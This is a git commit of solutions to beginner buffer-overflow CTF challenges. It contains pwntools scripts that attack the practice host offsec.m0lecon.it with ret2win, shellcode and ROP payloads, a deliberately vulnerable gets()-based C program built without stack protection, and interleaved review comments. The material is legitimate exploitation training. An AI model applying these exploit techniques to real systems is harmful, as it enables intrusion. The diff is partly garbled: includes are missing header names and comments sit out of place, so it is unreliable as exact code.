commit 563524658109056bb3737486c1544fdfceca3c5f
Author: emln
Date: Sat May 9 20:58:42 2026 +0200

    First CTFs

diff --git a/BOF/.gdb_history b/BOF/.gdb_history
new file mode 100644
index 0000000..58afc78
--- /dev/null
+++ b/BOF/.gdb_history
@@ -0,0 +1,2 @@
+run
+quit
diff --git a/BOF/01_guestbook/.gdb_history b/BOF/01_guestbook/.gdb_history
new file mode 100644
index 0000000..ff60466
--- /dev/null
+++ b/BOF/01_guestbook/.gdb_history
@@ -0,0 +1 @@
+quit
diff --git a/BOF/01_guestbook/guestbook b/BOF/01_guestbook/guestbook
new file mode 100755
index 0000000..1b70362
Binary files /dev/null and b/BOF/01_guestbook/guestbook differ
diff --git a/BOF/01_guestbook/solve.py b/BOF/01_guestbook/solve.py
new file mode 100644
index 0000000..de70724
--- /dev/null
+++ b/BOF/01_guestbook/solve.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+# context.binary = elf = ELF('guestbook',checksec=False)
+OFFSET_TO_RIP = 72
+ret = 0x40101A # ROPGadget ret
+win = 0x40121B # win address (nm)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13599)
+p.recvuntil(b"name?\n")
+
+payload = flat(
+ b"A" * OFFSET_TO_RIP,
+ p64(ret),
+ p64(win),
+)
+p.send(payload)
+p.interactive()
diff --git a/BOF/02_whispered_secrets/.gdb_history b/BOF/02_whispered_secrets/.gdb_history
new file mode 100644
index 0000000..a3e9e92
--- /dev/null
+++ b/BOF/02_whispered_secrets/.gdb_history
@@ -0,0 +1,2 @@
+r
+quit
diff --git a/BOF/02_whispered_secrets/solve.py b/BOF/02_whispered_secrets/solve.py
new file mode 100644
index 0000000..b404324
--- /dev/null
+++ b/BOF/02_whispered_secrets/solve.py
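Review bot: `ret` and `win` are hard-coded addresses while the `ELF('guestbook', ...)` line that would let pwntools resolve them is commented out, so the script silently breaks if the binary is rebuilt and nothing explains why a bare `ret` is placed before `win`. Loading the binary and resolving the symbols keeps the exploit self-documenting: `context.binary = elf = ELF("./guestbook", checksec=False)`, `win = elf.symbols["win"]`, `ret = ROP(elf).find_gadget(["ret"]).address`. The extra `ret` is presumably there to keep RSP 16-byte aligned before `win` calls into libc (`system`/`printf` fault on `movaps` otherwise), which deserves a comment such as `# ret gadget: realign RSP to 16 bytes before win()`. Also, `p.send(payload)` carries no newline; if the server reads with `gets`/`fgets` the read only completes once you type something in `interactive()`, so `p.sendline(payload)` is the safer call.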
@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("whispered_secrets", checksec=False)
+context.arch = "amd64"
+context.os = "linux"
+
+OFFSET_TO_RIP = 136
+
+p = remote("offsec.m0lecon.it", 13528)
+
+leak_line = p.recvline_contains(b"secret:")
+buf_addr = int(leak_line.split(b"secret: ")[1].strip(), 16)
+log.info(f"buf = {buf_addr:#x}")
+# NX disabled
+shellcode = asm(shellcraft.sh())
+
+payload = flat(shellcode, b"A" * (OFFSET_TO_RIP - len(shellcode)), p64(buf_addr))
+p.sendafter(b"secret:\n", payload)
+p.interactive()
diff --git a/BOF/02_whispered_secrets/whispered_secrets b/BOF/02_whispered_secrets/whispered_secrets
new file mode 100755
index 0000000..c41a3e6
Binary files /dev/null and b/BOF/02_whispered_secrets/whispered_secrets differ
diff --git a/BOF/03_tiny_escape_room/.gdb_history b/BOF/03_tiny_escape_room/.gdb_history
new file mode 100644
index 0000000..4add7a7
--- /dev/null
+++ b/BOF/03_tiny_escape_room/.gdb_history
@@ -0,0 +1,4 @@
+disass vuln
+run
+run
+quit
diff --git a/BOF/03_tiny_escape_room/Makefile b/BOF/03_tiny_escape_room/Makefile
new file mode 100644
index 0000000..0b65e39
--- /dev/null
+++ b/BOF/03_tiny_escape_room/Makefile
@@ -0,0 +1,10 @@
+CC = gcc
+CFLAGS = -fno-stack-protector -no-pie -O0 -g
+
+all: escape_room
+
+escape_room: main.c
+ $(CC) $(CFLAGS) -o $@ $<
+
+clean:
+ rm -f escape_room
diff --git a/BOF/03_tiny_escape_room/escape_room b/BOF/03_tiny_escape_room/escape_room
new file mode 100755
index 0000000..91d3adc
Binary files /dev/null and b/BOF/03_tiny_escape_room/escape_room differ
diff --git a/BOF/03_tiny_escape_room/main.c b/BOF/03_tiny_escape_room/main.c
new file mode 100644
index 0000000..fcf3c26
--- /dev/null
+++ b/BOF/03_tiny_escape_room/main.c
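Review bot: The filler length `OFFSET_TO_RIP - len(shellcode)` is never checked, so if `shellcraft.sh()` ever assembles to more than 136 bytes the `b"A" * negative` becomes empty and the return address lands inside the shellcode rather than in the saved-RIP slot, failing in a confusing way; add `assert len(shellcode) <= OFFSET_TO_RIP, "shellcode overruns the return address slot"` right after the `asm()` call. The leak parse `leak_line.split(b"secret: ")[1]` raises a bare `IndexError` if the banner wording changes; checking for the `b"secret: "` prefix and calling `log.error` with the raw line would name the real cause. Whether `p.sendafter(b"secret:\n", ...)` matches a second prompt after `recvline_contains` has already consumed the leak line depends on the binary's output, which is not visible here, so it is worth a comment stating which prompt it waits for.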
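Review bot: `-fno-stack-protector -no-pie` in CFLAGS deliberately strips the hardening the exercise is about, but nothing in the Makefile says so, and a later contributor tidying flags may re-enable it; a one-line comment above CFLAGS such as `# intentionally unhardened: this is the vulnerable challenge binary` prevents that. `all` and `clean` are not real files, so `.PHONY: all clean` should be declared or a stray file named `clean` breaks the target. Note that these flags leave NX at gcc's default, which is consistent with the ROP-based solve script rather than stack shellcode.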
@@ -0,0 +1,37 @@
+#include
+#include
+#include
+
+void setup() {
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win(int arg1, int arg2) {
+ if (arg1 == 0xdeadbeef && arg2 == 0xcafebabe) {
+ puts("Door unlocked!");
+ system("/bin/sh");
+ } else {
+ printf("Wrong keys: 0x%x, 0x%x\n", arg1, arg2);
+ }
+}
+
+void gadgets() {
+ __asm__("pop %rdi; ret");
+ __asm__("pop %rsi; ret");
+}
+
+void vuln() {
+ char buffer[64];
+ puts("Welcome to the tiny escape room!");
+ puts("Two magic keys open the door.");
+ puts("keys?");
+ gets(buffer);
+}
+
+int main() {
+ setup();
+ vuln();
+ return 0;
+}
diff --git a/BOF/03_tiny_escape_room/solve.py b/BOF/03_tiny_escape_room/solve.py
new file mode 100644
index 0000000..4e7f5bf
--- /dev/null
+++ b/BOF/03_tiny_escape_room/solve.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./escape_room", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13566)
+# p.recvuntil(b"keys?\n")
+# Your exploit here
+
+var1 = 0xDEADBEEF
+var2 = 0xCAFEBABE
+OFFSET = 72
+# Gadget to overwrite rdi e rsi (pop)
+# (Creati in main.c)
+rdi = 0x401287
+rsi = 0x401289
+ret = 0x40101A
+# win addr
+win = 0x40121B
+payload = flat(
+ b"A" * OFFSET,
+ p64(rsi),
+ p64(var2),
+ p64(rdi),
+ p64(var1),
+ p64(ret),
+ p64(win),
+)
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()
diff --git a/BOF/04_lemonade_stand/.gdb_history b/BOF/04_lemonade_stand/.gdb_history
new file mode 100644
index 0000000..832b898
--- /dev/null
+++ b/BOF/04_lemonade_stand/.gdb_history
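Review bot: The three `#include` lines at the top of the hunk name no header, so the file as shown would not compile (`puts`, `setvbuf`, `printf`, `gets` need `<stdio.h>`, `system` needs `<stdlib.h>`); if the angle-bracket names were stripped by the page rendering this is moot, but it is worth confirming against the committed file. Separately, on current glibc `gets` is not declared by `<stdio.h>` under the C11+ default that gcc uses without a `-std=` flag, and gcc 14 turns the resulting implicit declaration into an error; adding `char *gets(char *);` above `vuln()` or `-std=gnu99` to CFLAGS keeps the intentional overflow buildable. A comment marking the bug as deliberate, `// intentionally vulnerable: gets() has no bound on buffer[64]`, would stop a well-meaning `fgets` fix from neutralising the challenge.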
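Review bot: `gets(buffer)` in the accompanying main.c stops only at a newline and `p.send(payload)` sends none, so the remote read stays blocked until you press Enter inside `interactive()`; `p.sendline(payload)` terminates the line deterministically. The gadget and `win` addresses are hard-coded even though `elf` is loaded and the gadgets are emitted by `gadgets()` in main.c, so resolving them from the binary would survive a rebuild and make the chain self-explanatory; the two Italian comments (`rdi e rsi`, `Creati in main.c`) should also be English for the rest of the team. `OFFSET = 72` and the bare `ret` before `win` deserve a word each (64-byte buffer plus saved rbp; realigning RSP before `win` calls `system`), as in the rewritten setup below.
```python
rop = ROP(elf)
rdi = rop.find_gadget(["pop rdi", "ret"]).address  # emitted by gadgets() in main.c
rsi = rop.find_gadget(["pop rsi", "ret"]).address
ret = rop.find_gadget(["ret"]).address  # realign RSP to 16 bytes before win() -> system()
win = elf.symbols["win"]
OFFSET = 72  # char buffer[64] + saved rbp
# … unchanged: payload = flat(...) …
p.sendline(payload)
```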
@@ -0,0 +1,53 @@
+disass vuln
+b *0x00000000000012a7
+run
+n
+n
+n
+n
+n
+n
+c
+v
+c
+quit
+run
+disass main
+b *+23
+disass main
+breaj +23
+break +23
+info breakpoint
+info breakpoints
+clear breakpoints
+layout asm
+b
+b main
+c
+r
+b +23
+b main+23
+b *(main+23)
+c
+ni
+ni
+c
+quit
+disass main
+quit
+disass main
+disass vuln
+b *0x00000000000012a2
+r
+b +5
+quit
+disass vuln
+b *0x00000000000012a2
+r
+quit
+quit
+run
+quit
+r
+disass vuln
+quit
diff --git a/BOF/04_lemonade_stand/lemonade_stand b/BOF/04_lemonade_stand/lemonade_stand
new file mode 100755
index 0000000..6d06f47
Binary files /dev/null and b/BOF/04_lemonade_stand/lemonade_stand differ
diff --git a/BOF/04_lemonade_stand/solve.py b/BOF/04_lemonade_stand/solve.py
new file mode 100644
index 0000000..d7cd67e
--- /dev/null
+++ b/BOF/04_lemonade_stand/solve.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./lemonade_stand", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13562)
+# Your exploit here
+# mov eax, DWORD_PTR[rbp-0x4] overwrite eax value
+OFFSET = 76
+leet = 0x1337
+payload = flat(b"A" * OFFSET, p64(leet))
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()
diff --git a/BOF/05_mini_game_arena/.gdb_history b/BOF/05_mini_game_arena/.gdb_history
new file mode 100644
index 0000000..a9cdbf3
--- /dev/null
+++ b/BOF/05_mini_game_arena/.gdb_history
@@ -0,0 +1,3 @@
+r
+:q
+quit
diff --git a/BOF/05_mini_game_arena/mini_game b/BOF/05_mini_game_arena/mini_game
new file mode 100755
index 0000000..2f051d3
Binary files /dev/null and b/BOF/05_mini_game_arena/mini_game differ
diff --git a/BOF/05_mini_game_arena/solve.py b/BOF/05_mini_game_arena/solve.py
new file mode 100644
index 0000000..e4ba05e
--- /dev/null
+++ b/BOF/05_mini_game_arena/solve.py
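Review bot: The target is a 4-byte local (`mov eax, DWORD PTR [rbp-0x4]` per the comment) but `p64(leet)` writes eight bytes, so the four trailing zero bytes spill into the low half of the saved rbp; that is harmless only as long as nothing after `vuln` returns depends on rbp, and `payload = flat(b"A" * OFFSET, p32(leet))` is the exact write. `OFFSET = 76` is a bare number; `# 0x4c bytes from buffer start to [rbp-0x4]` would record where it came from. `p.send(payload)` has no terminating newline, which matters if the binary reads with `gets`/`fgets`; `p.sendline` is the safer default.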
@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF('./mini_game', checksec=False)
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it', 13509)
+# Your exploit here
+OFFSET = 72
+win = 0x4011fb
+payload = flat(
+ b'A'*OFFSET,
+ win,
+)
+p.send(payload)
+#p.send(b'cat flag\n')
+#p.recv()
+p.interactive()
diff --git a/BOF/06_cosmic_burger_joint/.gdb_history b/BOF/06_cosmic_burger_joint/.gdb_history
new file mode 100644
index 0000000..2451afd
--- /dev/null
+++ b/BOF/06_cosmic_burger_joint/.gdb_history
@@ -0,0 +1,4 @@
+run
+quit
+disass vuln
+quit
diff --git a/BOF/06_cosmic_burger_joint/cosmic_burger b/BOF/06_cosmic_burger_joint/cosmic_burger
new file mode 100755
index 0000000..70a5e81
Binary files /dev/null and b/BOF/06_cosmic_burger_joint/cosmic_burger differ
diff --git a/BOF/06_cosmic_burger_joint/solve.py b/BOF/06_cosmic_burger_joint/solve.py
new file mode 100644
index 0000000..47a938b
--- /dev/null
+++ b/BOF/06_cosmic_burger_joint/solve.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./cosmic_burger", checksec=False)
+
+p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13529)
+# Your exploit here
+OFFSET = 40
+# mov eax,DWORD PTR [rbp-0x4]
+# cmp eax,0xbeef
+# jne 0x12f2
+# mov eax,DWORD PTR [rbp-0x8]
+# cmp eax,0xf00d
+first = 0xBEEF
+second = 0xF00D
+payload = flat(
+ b"A" * OFFSET,
+ p32(second),
+ p32(first),
+)
+p.send(payload)
+p.interactive()
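Review bot: Unlike 01 and 03 this chain jumps straight to `win` with no alignment `ret` before it, so on entry RSP is 8 mod 16; if `win` calls `system()` or `printf()` that trips the `movaps` alignment check in libc and segfaults even with a correct offset. If the remote works as-is the function presumably avoids those calls, but an explicit gadget is cheap insurance: `ret = ROP(elf).find_gadget(["ret"]).address` and `payload = flat(b'A'*OFFSET, ret, win)`. `win = 0x4011fb` can also come from `elf.symbols["win"]` now that `context.binary` is set, if that is the symbol's name in this binary.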
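Review bot: `p = process(elf.path)` is executed and then immediately shadowed by `p = remote(...)`, so every run spawns a local `cosmic_burger` child that is never closed or used; the other scripts comment this line out and this one should too (`# p = process(elf.path)`). The ordering `p32(second)` for `[rbp-0x8]` then `p32(first)` for `[rbp-0x4]` matches the disassembly quoted in the comments, and a note next to the `flat()` call, `# [rbp-0x8] sits below [rbp-0x4], so 0xf00d is written first`, would make that explicit. `OFFSET = 40` should say what it was measured from, presumably `# buffer starts at rbp-0x30`.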